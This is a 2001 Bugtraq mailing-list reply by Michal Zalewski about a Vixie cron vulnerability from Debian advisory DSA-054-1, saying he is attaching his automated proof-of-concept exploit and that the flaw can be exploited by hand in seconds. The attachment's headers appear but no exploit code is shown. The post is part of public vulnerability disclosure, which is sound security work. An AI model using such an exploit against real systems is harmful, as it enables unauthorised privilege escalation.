[20576] in bugtraq
Re: Vixie cron vulnerability
daemon@ATHENA.MIT.EDU (Michal Zalewski)
Tue May 8 18:25:33 2001
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="-373265275-503631084-989335855=:8683"
Message-ID: <Pine.LNX.4.21.0105081128140.8683-200000@nimue.bos.bindview.com>
Date: Tue, 8 May 2001 11:30:55 -0400
Reply-To: Michal Zalewski <lcamtuf@COREDUMP.CX>
From: Michal Zalewski <lcamtuf@COREDUMP.CX>
X-To: Cade Cairns <cairnsc@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.GSO.4.30.0105071548070.19779-300000@mail>
---373265275-503631084-989335855=:8683
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Mon, 7 May 2001, Cade Cairns wrote:

> Attached is a simple proof of concept for the vixie cron vulnerability
> recently published in Debian Security Advisory DSA-054-1. The code was
> written during SIA analysis of this vulnerability.

Hm, there is my original proof-of-concept I coded for Sebastian Krahmer
(who discovered this vulnerability), while working on it. This
vulnerability affects Debian, SuSE, and probably a few other Linuxes as
well. It is a perfect example of bad coding, and how improper fixing of
bugs might lead to even more dangerous conditions. It is fully automated,
and I believe it gives absolutely nothing to the attacker, as this
vulnerability can be exploited by hand in approximately 5 seconds ;)

Michal Zalewski
http://lcamtuf.coredump.cx

---373265275-503631084-989335855=:8683
Content-Type: TEXT/PLAIN; charset=US-ASCII; name=corntab
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0105081130550.8683@nimue.bos.bindview.com>
Content-Description:
Content-Disposition: attachment; filename=corntab
---373265275-503631084-989335855=:8683--